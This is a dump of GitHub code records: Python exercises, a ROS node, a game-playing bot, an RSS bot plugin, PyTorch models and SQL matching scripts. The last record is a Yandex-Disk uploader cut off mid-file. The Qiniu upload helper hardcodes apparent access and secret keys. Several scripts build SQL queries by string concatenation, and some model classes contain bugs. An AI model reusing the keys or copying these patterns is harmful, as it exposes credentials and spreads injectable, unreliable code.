sequence B: ')\n C = input('Enter sequence C: ')\n A = A.split(',')\n B = B.split(',')\n C = C.split(',')\n resp = set_disjoint1(A, B, C)\n print(resp)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"williamdarkocode/AlgortithmsAndDataStructures","sub_path":"threeway_set_disjoint.py","file_name":"threeway_set_disjoint.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33036536576","text":"import qiniu\n\n# 需要填写你的 Access Key 和 Secret Key\naccess_key = 'kJ8wVO7lmFGsdvtI5M7eQDEJ1eT3Vrygb4SmR00E'\nsecret_key = 'rGwHyAvnlLK7rU4htRpNYzpuz0OHJKzX2O1LWTNl'\n# 要上传的空间\nbucket_name = 'infonews'\n\n\ndef upload_img(data):\n \"\"\"\n 上传文件\n :param data: 上传的文件 bytes\n :return: 上传后的文件名\n \"\"\"\n q = qiniu.Auth(access_key, secret_key)\n key = None # 上传的文件名 如果设置为None, 会生成随机名称\n token = q.upload_token(bucket_name)\n ret, info = qiniu.put_data(token, key, data)\n if ret is not None:\n return ret.get(\"key\")\n else:\n raise BaseException(info)\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/utils/image_storage.py","file_name":"image_storage.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70227366507","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\n\ndef callback(data):\n rospy.loginfo(rospy.get_caller_id()+\"I heard %s\",data.data)\n \ndef listener():\n\n # in ROS, nodes are unique named. If two nodes with the same\n # node are launched, the previous one is kicked off. The \n # anonymous=True flag means that rospy will choose a unique\n # name for our 'listener' node so that multiple listeners can\n # run simultaenously.\n rospy.init_node('hello_world_subscriber', anonymous=True)\n\n rospy.Subscriber(\"hello_pub\", String, callback)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n \nif __name__ == '__main__':\n listener()\n","repo_name":"PacktPublishing/Learning-Robotics-using-Python-Second-Edition","sub_path":"chapter_1_code/hello_world/scripts/hello_world_subscriber.py","file_name":"hello_world_subscriber.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"37"} +{"seq_id":"34918092046","text":"#!/usr/bin/env python3\nfrom pyautogui import *\nimport pyautogui\nimport time\nimport keyboard\nimport win32api as winapi\nimport win32con as wincon\n\ndef click(x, y):\n winapi.SetCursorPos((x,y))\n winapi.mouse_event(wincon.MOUSEEVENTF_LEFTDOWN, 0, 0)\n time.sleep(0.01)\n winapi.mouse_event(wincon.MOUSEEVENTF_LEFTUP, 0, 0)\n\ndef pause():\n pause_location = pyautogui.locateOnScreen('pause.png', grayscale=True, confidence=0.9)\n if(pause_location is not None):\n pause_location = pyautogui.center(pause_location)\n click(pause_location[0], pause_location[1])\n while(keyboard.is_pressed('p')) == False:\n continue\n \n winapi.SetCursorPos((0,0))\n time.sleep(1)\n\n resume_location = pyautogui.locateOnScreen('resume.png', grayscale=True, confidence=0.9)\n if(resume_location is not None):\n resume_location = pyautogui.center(resume_location)\n click(resume_location[0], resume_location[1])\n else:\n return False\n \n return True\n\n\n\ndef main():\n bar_location = pyautogui.locateOnScreen('bar.png', grayscale=True, confidence=0.9)\n if(bar_location is None):\n bar_location = (0,0)\n\n while(keyboard.is_pressed('q')) == False:\n if(keyboard.is_pressed('p')):\n if(pause() == False):\n print(\"Unable to resume\")\n exit() \n\n ball_location = pyautogui.locateOnScreen('ball.png', grayscale=True, confidence=0.7)\n if(ball_location is not None):\n ball_location = pyautogui.center(ball_location)\n if(bar_location == (0, 0)):\n winapi.SetCursorPos(ball_location)\n else:\n winapi.SetCursorPos((ball_location[0], bar_location[1]))\n\n time.sleep(0.01)\n\n\n\nif __name__ == \"__main__\":\n print(\"Press q to start/end the program\")\n while(keyboard.is_pressed('q')) == False:\n continue\n\n print(\"Program starting\\nPress \\'p\\' for pausing the bot or \\'q\\' to end it\")\n time.sleep(2)\n main()\n\nprint(\"Program ended\")","repo_name":"FadedGuy/BreakoutBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32654551037","text":"import arrow\nimport difflib\nimport re\nimport sqlite3\n\nfrom email.utils import parsedate_to_datetime\nfrom nonebot import logger\nfrom pyquery import PyQuery as Pq\nfrom tinydb import TinyDB\nfrom tinydb.middlewares import CachingMiddleware\nfrom tinydb.storages import JSONStorage\nfrom typing import List, Dict\n\nfrom .cache_manage import (\n cache_db_manage,\n cache_json_manage,\n duplicate_exists,\n insert_into_cache_db,\n)\nfrom .cache_manage import cache_filter\nfrom .check_update import check_update\nfrom .download_torrent import down_torrent\nfrom .handle_html_tag import handle_bbcode\nfrom .handle_html_tag import handle_html_tag\nfrom .handle_images import handle_img\nfrom .handle_translation import handle_translation\nfrom .send_message import send_msg\nfrom .utils import get_proxy\nfrom .utils import get_summary\nfrom .write_rss_data import write_item\nfrom ....RSS.rss_class import Rss\nfrom ....config import config\nfrom ....config import DATA_PATH\n\n\n# 订阅器启动的时候将解析器注册到rss实例类?,避免每次推送时再匹配\nclass ParsingItem:\n def __init__(\n self, func: callable, rex: str = \"(.*)\", priority: int = 10, block: bool = False\n ):\n \"\"\"\n - **类型**: ``object``\n - **说明**: 解析函数\n \"\"\"\n self.func: callable = func\n\n \"\"\"\n - **类型**: ``str``\n - **说明**: 匹配的订阅地址正则,\"(.*)\" 是全都匹配\n \"\"\"\n self.rex: str = rex\n\n \"\"\"\n - **类型**: ``int``\n - **说明**: 优先级,数字越小优先级越高。优先级相同时,会抛弃默认处理方式,即抛弃 rex=\"(.*)\" \n \"\"\"\n self.priority: int = priority\n\n \"\"\"\n - **类型**: ``bool``\n - **说明**: 是否阻止执行之后的处理,默认不阻止。抛弃默认处理方式,只需要 block==True and priority<10\n \"\"\"\n self.block: bool = block\n\n\n# 解析器排序\ndef _sort(_list):\n _list.sort(key=lambda x: x.priority)\n return _list\n\n\n# rss 解析类 ,需要将特殊处理的订阅注册到该类\nclass ParsingBase:\n \"\"\"\n - **类型**: ``List[ParsingItem]``\n - **说明**: 最先执行的解析器,定义了检查更新等前置步骤\n \"\"\"\n\n before_handler: List[ParsingItem] = []\n\n \"\"\"\n - **类型**: ``Dict[str, List[ParsingItem]]``\n - **说明**: 解析器\n \"\"\"\n handler: Dict[str, List[ParsingItem]] = {\n \"before\": [], # item的预处理\n \"title\": [],\n \"summary\": [],\n \"picture\": [],\n \"source\": [],\n \"date\": [],\n \"torrent\": [],\n \"after\": [], # item的最后处理,此处调用消息截取、发送\n }\n\n \"\"\"\n - **类型**: ``List[ParsingItem]``\n - **说明**: 最后执行的解析器,在消息发送后,也可以多条消息合并发送\n \"\"\"\n after_handler: List[ParsingItem] = []\n\n # 增加解析器\n @classmethod\n def append_handler(\n cls,\n parsing_type: str,\n rex: str = \"(.*)\",\n priority: int = 10,\n block: bool = False,\n ):\n def _decorator(func):\n cls.handler.get(parsing_type).append(\n ParsingItem(func, rex, priority, block)\n )\n cls.handler.update({parsing_type: _sort(cls.handler.get(parsing_type))})\n return func\n\n return _decorator\n\n @classmethod\n def append_before_handler(\n cls, rex: str = \"(.*)\", priority: int = 10, block: bool = False\n ):\n def _decorator(func):\n cls.before_handler.append(ParsingItem(func, rex, priority, block))\n cls.before_handler = _sort(cls.before_handler)\n return func\n\n return _decorator\n\n @classmethod\n def append_after_handler(\n cls, rex: str = \"(.*)\", priority: int = 10, block: bool = False\n ):\n def _decorator(func):\n cls.after_handler.append(ParsingItem(func, rex, priority, block))\n cls.after_handler = _sort(cls.after_handler)\n return func\n\n return _decorator\n\n\n# 对处理器进行过滤\ndef _handler_filter(_handler_list: list, _url: str) -> list:\n _result = [h for h in _handler_list if re.search(h.rex, _url)]\n # 删除优先级相同时默认的处理器\n _delete = [\n (h.func.__name__, \"(.*)\", h.priority) for h in _result if h.rex != \"(.*)\"\n ]\n _result = [\n h for h in _result if not ((h.func.__name__, h.rex, h.priority) in _delete)\n ]\n return _result\n\n\n# 解析实例\nclass ParsingRss:\n\n # 初始化解析实例\n def __init__(self, rss: Rss):\n self.state = {} # 用于存储实例处理中上下文数据\n self.rss = rss\n\n # 对处理器进行过滤\n self.before_handler = _handler_filter(\n ParsingBase.before_handler, self.rss.get_url()\n )\n self.handler = {}\n for k, v in ParsingBase.handler.items():\n self.handler[k] = _handler_filter(v, self.rss.get_url())\n self.after_handler = _handler_filter(\n ParsingBase.after_handler, self.rss.get_url()\n )\n\n # 开始解析\n async def start(self, rss_name: str, new_rss: dict):\n # new_data 是完整的 rss 解析后的 dict\n # 前置处理\n rss_title = new_rss.get(\"feed\").get(\"title\")\n new_data = new_rss.get(\"entries\")\n _file = DATA_PATH / (rss_name + \".json\")\n db = TinyDB(\n _file,\n storage=CachingMiddleware(JSONStorage),\n encoding=\"utf-8\",\n sort_keys=True,\n indent=4,\n ensure_ascii=False,\n )\n self.state.update(\n {\n \"rss_title\": rss_title,\n \"new_data\": new_data,\n \"change_data\": [], # 更新的消息列表\n \"conn\": None, # 数据库连接\n \"tinydb\": db, # 缓存 json\n }\n )\n for handler in self.before_handler:\n self.state.update(await handler.func(rss=self.rss, state=self.state))\n if handler.block:\n break\n\n # 分条处理\n self.state.update(\n {\n \"messages\": [],\n \"item_count\": 0,\n }\n )\n for item in self.state.get(\"change_data\"):\n item_msg = f\"【{self.state.get('rss_title')}】更新了!\\n----------------------\\n\"\n\n for handler_list in self.handler.values():\n # 用于保存上一次处理结果\n tmp = \"\"\n tmp_state = {\"continue\": True} # 是否继续执行后续处理\n\n # 某一个内容的处理如正文,传入原文与上一次处理结果,此次处理完后覆盖\n for handler in handler_list:\n tmp = await handler.func(\n rss=self.rss,\n state=self.state,\n item=item,\n item_msg=item_msg,\n tmp=tmp,\n tmp_state=tmp_state,\n )\n if handler.block or not tmp_state[\"continue\"]:\n break\n item_msg += tmp\n self.state.get(\"messages\").append(item_msg)\n\n # 最后处理\n for handler in self.after_handler:\n self.state.update(await handler.func(rss=self.rss, state=self.state))\n if handler.block:\n break\n\n\n# 检查更新\n@ParsingBase.append_before_handler(priority=10)\nasync def handle_check_update(rss: Rss, state: dict):\n db = state.get(\"tinydb\")\n change_data = await check_update(db, state.get(\"new_data\"))\n return {\"change_data\": change_data}\n\n\n# 判断是否满足推送条件\n@ParsingBase.append_before_handler(priority=11)\nasync def handle_check_update(rss: Rss, state: dict):\n change_data = state.get(\"change_data\")\n db = state.get(\"tinydb\")\n for item in change_data.copy():\n summary = get_summary(item)\n # 检查是否包含屏蔽词\n if config.black_word and re.findall(\"|\".join(config.black_word), summary):\n logger.info(\"内含屏蔽词,已经取消推送该消息\")\n write_item(db, item)\n change_data.remove(item)\n continue\n # 检查是否匹配关键词 使用 down_torrent_keyword 字段,命名是历史遗留导致,实际应该是白名单关键字\n if rss.down_torrent_keyword and not re.search(\n rss.down_torrent_keyword, summary\n ):\n write_item(db, item)\n change_data.remove(item)\n continue\n # 检查是否匹配黑名单关键词 使用 black_keyword 字段\n if rss.black_keyword and (\n re.search(rss.black_keyword, item[\"title\"])\n or re.search(rss.black_keyword, summary)\n ):\n write_item(db, item)\n change_data.remove(item)\n continue\n # 检查是否只推送有图片的消息\n if (rss.only_pic or rss.only_has_pic) and not re.search(\n r\"|\\[img]\", summary\n ):\n logger.info(f\"{rss.name} 已开启仅图片/仅含有图片,该消息没有图片,将跳过\")\n write_item(db, item)\n change_data.remove(item)\n\n return {\"change_data\": change_data}\n\n\n# 如果启用了去重模式,对推送列表进行过滤\n@ParsingBase.append_before_handler(priority=12)\nasync def handle_check_update(rss: Rss, state: dict):\n change_data = state.get(\"change_data\")\n conn = state.get(\"conn\")\n db = state.get(\"tinydb\")\n\n # 检查是否启用去重 使用 duplicate_filter_mode 字段\n if not rss.duplicate_filter_mode:\n return {\"change_data\": change_data}\n\n if not conn:\n conn = sqlite3.connect(DATA_PATH / \"cache.db\")\n conn.set_trace_callback(logger.debug)\n\n await cache_db_manage(conn)\n\n delete = []\n for index, item in enumerate(change_data):\n is_duplicate, image_hash = await duplicate_exists(\n rss=rss,\n conn=conn,\n item=item,\n summary=get_summary(item),\n )\n if is_duplicate:\n write_item(db, item)\n delete.append(index)\n else:\n change_data[index][\"image_hash\"] = str(image_hash)\n\n change_data = [\n item for index, item in enumerate(change_data) if index not in delete\n ]\n\n return {\n \"change_data\": change_data,\n \"conn\": conn,\n }\n\n\n# 处理标题\n@ParsingBase.append_handler(parsing_type=\"title\")\nasync def handle_title(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n # 判断是否开启了只推送图片\n if rss.only_pic:\n return \"\"\n\n title = item[\"title\"]\n\n if not config.blockquote:\n title = re.sub(r\" - 转发 .*\", \"\", title)\n\n res = f\"标题:{title}\\n\"\n if rss.translation:\n res += await handle_translation(content=title)\n\n # 如果开启了只推送标题,跳过下面判断标题与正文相似度的处理\n if rss.only_title:\n return res\n\n # 判断标题与正文相似度,避免标题正文一样,或者是标题为正文前N字等情况\n try:\n summary_html = Pq(get_summary(item))\n if not config.blockquote:\n summary_html.remove(\"blockquote\")\n similarity = difflib.SequenceMatcher(\n None, summary_html.text()[: len(title)], title\n )\n # 标题正文相似度\n if similarity.ratio() > 0.6:\n res = \"\"\n except Exception as e:\n logger.warning(f\"{rss.name} 没有正文内容!{e}\")\n\n return res\n\n\n# 处理正文 判断是否是仅推送标题 、是否仅推送图片\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=1)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n if rss.only_title or rss.only_pic:\n tmp_state[\"continue\"] = False\n return \"\"\n\n\n# 处理正文 处理网页 tag\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=10)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n try:\n tmp += await handle_html_tag(html=Pq(get_summary(item)))\n except Exception as e:\n logger.warning(f\"{rss.name} 没有正文内容!{e}\")\n return tmp\n\n\n# 处理正文 移出指定内容\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=11)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n # 移除指定内容\n if rss.content_to_remove:\n for pattern in rss.content_to_remove:\n tmp = re.sub(pattern, \"\", tmp)\n return tmp\n\n\n# 处理正文 翻译\n@ParsingBase.append_handler(parsing_type=\"summary\", priority=12)\nasync def handle_summary(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n if rss.translation:\n tmp += await handle_translation(tmp)\n return tmp\n\n\n# 处理图片\n@ParsingBase.append_handler(parsing_type=\"picture\")\nasync def handle_picture(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n\n # 判断是否开启了只推送标题\n if rss.only_title:\n return \"\"\n\n res = \"\"\n try:\n res += await handle_img(\n item=item,\n img_proxy=rss.img_proxy,\n img_num=rss.max_image_number,\n )\n except Exception as e:\n logger.warning(f\"{rss.name} 没有正文内容!{e}\")\n\n # 判断是否开启了只推送图片\n if rss.only_pic:\n return f\"{res}\\n\"\n\n return f\"{tmp + res}\\n\"\n\n\n# 处理来源\n@ParsingBase.append_handler(parsing_type=\"source\")\nasync def handle_source(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n return f\"链接:{item['link']}\\n\"\n\n\n# 处理种子\n@ParsingBase.append_handler(parsing_type=\"torrent\")\nasync def handle_torrent(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n res = \"\"\n if not rss.is_open_upload_group:\n rss.group_id = []\n if rss.down_torrent:\n # 处理种子\n try:\n hash_list = await down_torrent(\n rss=rss, item=item, proxy=get_proxy(rss.img_proxy)\n )\n if hash_list and hash_list[0] is not None:\n res += \"\\n磁力:\\n\"\n for h in hash_list:\n res += f\"magnet:?xt=urn:btih:{h}\\n\"\n res = res[:-1]\n except Exception as e:\n logger.error(f\"下载种子时出错:{e}\")\n return res\n\n\n# 处理日期\n@ParsingBase.append_handler(parsing_type=\"date\")\nasync def handle_date(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n date = item.get(\"published\", item.get(\"updated\"))\n if date:\n try:\n date = parsedate_to_datetime(date)\n except TypeError:\n pass\n finally:\n date = arrow.get(date).to(\"Asia/Shanghai\")\n else:\n date = arrow.now()\n return f\"日期:{date.format('YYYY年MM月DD日 HH:mm:ss')}\"\n\n\n# 发送消息\n@ParsingBase.append_handler(parsing_type=\"after\")\nasync def handle_message(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n db = state.get(\"tinydb\")\n\n # 发送消息并写入文件\n if await send_msg(rss=rss, msg=item_msg, item=item):\n\n if rss.duplicate_filter_mode:\n await insert_into_cache_db(\n conn=state.get(\"conn\"), item=item, image_hash=item.get(\"image_hash\")\n )\n\n if item.get(\"to_send\"):\n item.pop(\"to_send\")\n\n state[\"item_count\"] += 1\n else:\n item[\"to_send\"] = True\n if not item.get(\"count\"):\n item[\"count\"] = 1\n else:\n item[\"count\"] += 1\n\n write_item(db, item)\n\n return \"\"\n\n\n@ParsingBase.append_after_handler()\nasync def after_handler(rss: Rss, state: dict) -> dict:\n item_count = state.get(\"item_count\")\n conn = state.get(\"conn\")\n db = state.get(\"tinydb\")\n\n if item_count > 0:\n logger.info(f\"{rss.name} 新消息推送完毕,共计:{item_count}\")\n else:\n logger.info(f\"{rss.name} 没有新信息\")\n\n if conn is not None:\n conn.close()\n\n new_data_length = len(state.get(\"new_data\"))\n await cache_json_manage(db, new_data_length)\n db.close()\n\n return {}\n","repo_name":"mobyw/nonebot-general-rss","sub_path":"src/plugins/nonebot-general-rss/RSS/routes/Parsing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16532,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"30449488163","text":"# !/usr/bin/env python3\n# coding: utf-8\n\n# 3. Написать программу, которая принимает путь к текстовому файлу и букву\n# и выводит список слов, которые начинаются с указанной буквы.\n\n\ndef read_text(link_text):\n text = open(link_text)\n text_line = text.readlines()\n for i in range(len(text_line)):\n line_list = text_line[i].split(\" \")\n for j in range(len(line_list)):\n yield line_list[j]\n\n\ndef gen_find_words(gen, char):\n words_list = []\n while True:\n try:\n i = next(gen)\n if i.startswith(char.lower()) or i.startswith(char.upper()):\n words_list.append(i)\n else:\n continue\n except StopIteration:\n break\n return words_list\n\n\nR = read_text(\"Text_Example.txt\")\nprint(gen_find_words(R, 'ф'))\n","repo_name":"PlusSP/Python","sub_path":"generators/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18462864240","text":"#!/usr/bin/env python3\n\ndef main():\n n, m = map(int, input().split())\n ab = [list(map(int,input().split())) for _ in range(m)]\n\n list1 = []\n list2 = []\n\n for i in range(m):\n if ab[i][0] == 1:\n list1.append(ab[i][1])\n if ab[i][1] == n:\n list2.append(ab[i][0])\n\n lists_and = set(list1) & set(list2)\n\n if len(lists_and) > 0:\n print('POSSIBLE')\n else:\n print('IMPOSSIBLE')\nmain()","repo_name":"KeiNishikawa218/atcoder","sub_path":"arc079/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24511504245","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom efficientnet_pytorch import EfficientNet\nfrom model import AuxClassifier\n\nclass RobustDenseNet(nn.Module):\n \"\"\" DenseNet with aux output \"\"\"\n def __init__(self, pretrained, num_classes):\n super(RobustDenseNet, self).__init__()\n self.base_network = torchvision.models.densenet121(\n pretrained=pretrained)\n self.base_network.classifier = nn.Linear(\n in_features=1024, out_features=num_classes, bias=True)\n self.aux_classifier = AuxClassifier(512, num_classes)\n\n def setup_hook(self):\n self.mid_output = []\n def hook(module, input, output):\n self.mid_output.append(output)\n hook_obj = self.base_network.features.denseblock2.register_forward_hook(hook)\n return hook_obj\n\n def forward(self, x):\n hook_obj = self.setup_hook()\n pred = self.base_network.forward(x)\n if self.training:\n mid_out = self.mid_output\n aux_pred = self.aux_classifier(mid_out[0])\n hook_obj.remove()\n return pred, aux_pred\n else:\n return pred\n\n\nclass RobustEfficientNet(RobustDenseNet):\n def __init__(self, pretrained, num_classes):\n super(RobustEfficientNet, self).__init__()\n model = EfficientNet.from_pretrained('efficientnet-b4')\n self.base_network.classifier = nn.Linear(\n in_features=1792, out_features=num_classes, bias=True)\n self.aux_classifier = AuxClassifier(112, num_classes)\n\n def setup_hook(self):\n self.mid_output = []\n def hook(module, input, output):\n self.mid_output.append(output)\n hook_obj = self.base_network._blocks[16].register_forward_hook(hook)\n return hook_obj\n\n\nclass BasicNet2(nn.Module):\n def __init__(self):\n super(BasicNet2, self).__init__()\n initNum = 128\n self.init_layer = nn.Conv2d(3, initNum, kernel_size=3, stride=1,\n padding=1)\n self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n self.conv1_a = nn.Conv2d(initNum, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv1_b = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv1_c = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.bn1 = nn.BatchNorm2d(initNum*2, initNum*2)\n\n # self.conv_dn1 = nn.Conv2d(initNum*2, initNum*2, kernel_size=2,\n # stride=2, padding=0)\n\n initNum = initNum*2\n self.conv2_a = nn.Conv2d(initNum, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv2_b = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv2_c = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.bn2 = nn.BatchNorm2d(initNum*2, initNum*2)\n\n # self.conv_dn2 = nn.Conv2d(initNum*2, initNum*2, kernel_size=2,\n # stride=2, padding=0)\n\n initNum = initNum*2\n self.conv3_a = nn.Conv2d(initNum, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv3_b = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.conv3_c = nn.Conv2d(initNum*2, initNum*2, kernel_size=3, stride=1,\n padding=1)\n self.bn3 = nn.BatchNorm2d(initNum*2, initNum*2)\n initNum = initNum*2\n\n # self.conv_dn3 = nn.Conv2d(initNum, initNum, kernel_size=2, stride=2,\n # padding=0)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.final = nn.Linear(initNum, 2)\n\n def forward(self, x):\n x = F.relu(self.init_layer(x))\n\n x = F.relu(self.bn1(self.conv1_a(x)))\n x = F.relu(self.bn1(self.conv1_b(x)))\n x1 = F.relu(self.bn1(self.conv1_c(x)))\n x = x1 + x\n x = self.maxpool(x)\n\n x = F.relu(self.bn2(self.conv2_a(x)))\n x = F.relu(self.bn2(self.conv2_b(x)))\n x1 = F.relu(self.bn2(self.conv2_c(x)))\n x = x1 + x\n x = self.maxpool(x)\n\n x = F.relu(self.bn3(self.conv3_a(x)))\n x = F.relu(self.bn3(self.conv3_b(x)))\n x1 = F.relu(self.bn3(self.conv3_c(x)))\n x = x1 + x\n x = self.maxpool(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.final(x)\n return x\n\n\nclass BasicNet(nn.Module):\n def __init__(self):\n super(BasicNet, self).__init__()\n self.init_layer = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1)\n\n self.block1 = BasicConvBlock(64)\n self.conv_pool1 = nn.Conv2d(128, 128, kernel_size=2, stride=2,\n padding=0)\n # self.attn1 = SelfAttentionModule(32)\n\n self.block2 = BasicConvBlock(128)\n self.conv_pool2 = nn.Conv2d(256, 256, kernel_size=2, stride=2,\n padding=0)\n\n self.block3 = BasicConvBlock(256)\n self.conv_pool3 = nn.Conv2d(512, 512, kernel_size=2, stride=2,\n padding=0)\n self.attn2 = SelfAttentionModule(512)\n\n # self.semi_final = nn.Conv2d(128, 1, kernel_size=1)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.final = nn.Linear(512, 2)\n\n def forward(self, x):\n x = F.relu(self.init_layer(x))\n x = self.block1(x)\n x = self.conv_pool1(x)\n # x = self.attn1(x)\n x = self.block2(x)\n x = self.conv_pool2(x)\n x = self.block3(x)\n x = self.conv_pool3(x)\n # x, attn_map = self.attn2(x)\n # x = F.relu(self.semi_final(x))\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n out = self.final(x)\n return out\n\n\nclass BasicConvBlock(nn.Module):\n def __init__(self, in_channels):\n super(BasicConvBlock, self).__init__()\n self.bn = nn.BatchNorm2d(in_channels*2, in_channels*2)\n self.convLayer1 = nn.Conv2d(in_channels, in_channels*2, kernel_size=3,\n stride=1, padding=1)\n self.convLayer2 = nn.Conv2d(in_channels*2, in_channels*2,\n kernel_size=3,\n stride=1, padding=1)\n self.convLayer3 = nn.Conv2d(in_channels*2, in_channels*2,\n kernel_size=3,\n stride=1, padding=1)\n\n def forward(self, x):\n x = F.relu(self.bn(self.convLayer1(x)))\n out = F.relu(self.bn(self.convLayer2(x)))\n out = F.relu(self.bn(self.convLayer3(out)))\n out = out + x\n return x\n","repo_name":"abhinavdhere/covid19_xray","sub_path":"exp_models.py","file_name":"exp_models.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11055785217","text":"from pysql import DB_CONFIG, DB_commands, get_command, ex\n\n\n\n\ndef match_post_user():\n comm_post = \"SELECT * FROM post\"\n res_post = ex(DB_CONFIG, comm_post, 'v')\n for i in res_post:\n user_id_temp=i[-2]\n if i[0]!='c25f0014-47ed-4db4-aaab-23c0ca8af4d2':\n comm_user= \"SELECT * FROM users WHERE user_id_temp=%s\" % \"'\" + user_id_temp + \"'\"\n res_user = ex(DB_CONFIG, comm_user, 'v')\n for j in res_user:\n comm_update = \"UPDATE post SET user_id = %s WHERE user_id_temp =%s\" % (\"'\" +j[0]+ \"'\",\"'\" + user_id_temp + \"'\")\n ex(DB_CONFIG, comm_update)\n\ndef match_post_comment():\n comm_post = \"SELECT * FROM post\"\n res_post = ex(DB_CONFIG, comm_post, 'v')\n for i in res_post:\n id_post=i[0]\n id_post_temp=i[-1]\n comm_comments= \"UPDATE comment SET post_id= %s WHERE post_id_temp=%s\" % (\"'\" +id_post+ \"'\",\"'\" + id_post_temp + \"'\")\n ex(DB_CONFIG, comm_comments)\n\n\ndef match_post_member():\n comm_user = \"SELECT * FROM users\"\n res_user = ex(DB_CONFIG, comm_user, 'v')\n for i in res_user:\n if i[-1] is not None:\n id_user=i[0]\n id_user_temp=i[-1]\n comm_comments= \"UPDATE post SET user_id= %s WHERE user_id_temp=%s\" % (\"'\" +id_user+ \"'\",\"'\" + id_user_temp + \"'\")\n ex(DB_CONFIG, comm_comments)\n\ndef match_post_group():\n comm_post = \"SELECT * FROM post\"\n res_post = ex(DB_CONFIG, comm_post, 'v')\n for i in res_post:\n gr_id_temp=i[-3]\n comm_groups = \"SELECT * FROM groups WHERE group_id_temp=%s\" % \"'\" +gr_id_temp+ \"'\"\n res_groups = ex(DB_CONFIG, comm_groups, 'v')\n for t in res_groups:\n comm_post_upd= \"UPDATE post SET group_id= %s WHERE group_id_temp=%s\" % (\"'\" +t[0]+ \"'\",\"'\" + gr_id_temp + \"'\")\n ex(DB_CONFIG, comm_post_upd)\n\ndef match_group_owner():\n comm_group_owner = \"select * from group_member where administrator = True\"\n res_g_o = ex(DB_CONFIG, comm_group_owner, 'v')\n for i in res_g_o:\n gr_id=i[0]\n adm_id=i[1]\n comm_group_upd = \"UPDATE groups SET owner_id= %s WHERE id=%s\" % (\"'\" + adm_id + \"'\", \"'\" + gr_id + \"'\")\n ex(DB_CONFIG, comm_group_upd)\n\n\ndef match_file_owner():\n comm_post= \"select * from post\"\n res_comm_post= ex(DB_CONFIG, comm_post, 'v')\n for i in res_comm_post:\n id_post_temp=i[-1]\n id_user=i[2]\n print(id_post_temp)\n print(id_user)\n comm_file_upd = \"UPDATE file SET owner_id= %s WHERE post_id_temp=%s\" % (\"'\" + id_user + \"'\", \"'\" + id_post_temp + \"'\")\n print(comm_file_upd)\n\n\n\n\n\n\n\n\n\n#match_post_comment()\n#match_post_user()\n#match_post_member()\n#match_post_group()\n#match_group_owner()\n#match_file_owner()","repo_name":"AlexVepr12/workspace","sub_path":"matching.py","file_name":"matching.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39184020322","text":"import requests\nimport os\n\n\ntoken=input('Введите токен: ')\nfile_directory=input('Введите путь до файла на компьютере: ')\n\nHEADERS = {'Authorization': f'OAuth {token}'}\n\nclass YaUploader:\n def __init__(self, token: str):\n self.token = token\n\n def upload(self, file_path: str):\n self.file_path = file_directory\n step1 = requests.get('https://cloud-api.yandex.net/v1/disk/resources/upload', \n 